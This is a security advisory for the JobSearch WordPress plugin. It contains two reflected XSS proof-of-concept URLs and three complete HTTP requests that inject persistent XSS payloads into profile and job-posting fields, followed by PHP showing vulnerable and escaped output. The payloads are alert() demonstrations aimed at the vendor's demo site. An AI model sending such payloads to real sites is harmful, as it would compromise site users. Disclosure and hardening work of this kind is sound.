An unauthenticated reflected XSS and multiple authenticated persistent XSS vulnerabilities were discovered in the JobSearch plugin through 1.5.1 and 1.5.2 for WordPress. The authenticated persistent XSS affects the Candidate and Employer profile pages. The authenticated persistent XSS in the Job page triggers on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.
### [ PoC Unauthenticated Reflected XSS: ]

https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60XSS%60%29%3B%20%22%3E

https://eyecix.com/plugins/jobsearch/?sector_cat=%22--%3E%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28%60XSS%60%29%3B%2F%2F%22%3E1%22--%3E

### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!]

```http
POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765
Content-Length: 6644
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_phone"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="dial_code"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_sector"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_bio"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="academic-level"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="Age"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="salary"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="gender"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="industry"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------27142012921130118151484572765--
```

### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!]

```http
POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175
Content-Length: 6868
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_phone"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_website"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_sector"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_mm"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_yy"

1900
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_bio"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="founded-since"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`)//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------321608141216835281602774802175--
```

### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!]

```http
POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298
Content-Length: 5216
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/
Cookie: [cookies_here]

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_detail"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="application_deadline"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_sector"

12
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_type"

4
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="get_job_skills[]"

poc
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_url"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_email"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_max_salary"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="offered-salary"

31337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="career-level"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="experience"

4-years"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="gender"

male"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="Industry"

graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="qualifications"

masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------35378657672420857749655614298--
```
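As an added illustration (not the plugin's own code), the output pattern behind each class of PoC above beside its hardened WordPress form; the example_* function names are hypothetical, and the field names are taken from the requests above:

```php
<?php
// Added example, not JobSearch plugin code: the two output contexts the PoCs
// above abuse, each beside a hardened form. Assumes a WordPress runtime for
// esc_attr(), esc_html(), sanitize_text_field(), wp_unslash() and
// get_user_meta()/update_user_meta(); the example_* function names are
// hypothetical, the field names come from the PoC requests.

// Reflected: ?location= echoed into a quoted attribute. The decoded value
// " autofocus onfocus=alert(`XSS`); "> ends the attribute and adds an
// event handler, which is what the first reflected PoC URL carries.
function example_location_input_vulnerable() {
    $location = isset( $_GET['location'] ) ? $_GET['location'] : '';
    return '<input type="text" name="location" value="' . $location . '">';
}

// Fixed: esc_attr() entity-encodes " ' < > & so the value can neither end
// the attribute nor open a tag. Escape at output, for the output context.
function example_location_input_fixed() {
    $location = isset( $_GET['location'] ) ? wp_unslash( $_GET['location'] ) : '';
    return '<input type="text" name="location" value="' . esc_attr( $location ) . '">';
}

// Stored: a dashboard-settings field saved raw and echoed raw later. The
// "--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"--> value in
// the persistent PoCs combines a quoted-attribute breakout with an
// HTML-comment breakout, so unescaped output fires in either context.
function example_save_phone_vulnerable( $user_id ) {
    update_user_meta( $user_id, 'user_phone', $_POST['user_phone'] );
}
function example_show_phone_vulnerable( $user_id ) {
    return '<span class="phone">' . get_user_meta( $user_id, 'user_phone', true ) . '</span>';
}

// Fixed: sanitize on save (tags stripped, whitespace normalised) AND escape
// on output. Either alone is not enough: rows stored before the fix, or by
// another code path writing the same meta key, still reach the template.
function example_save_phone_fixed( $user_id ) {
    if ( ! isset( $_POST['user_phone'] ) ) {
        return;
    }
    $phone = sanitize_text_field( wp_unslash( $_POST['user_phone'] ) );
    update_user_meta( $user_id, 'user_phone', $phone );
}
function example_show_phone_fixed( $user_id ) {
    $phone = get_user_meta( $user_id, 'user_phone', true );
    return '<span class="phone">' . esc_html( $phone ) . '</span>';
}
```

The same save/escape pairing applies to every field the PoCs populate (job_detail, offered-salary, jobsearch_field_team_*[] and so on), with esc_attr() or esc_url() chosen by where each value is printed.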
Vlad Vector
VLΛD VΞCTOR
Yes
2020-07-05
2020-07-05
2020-07-08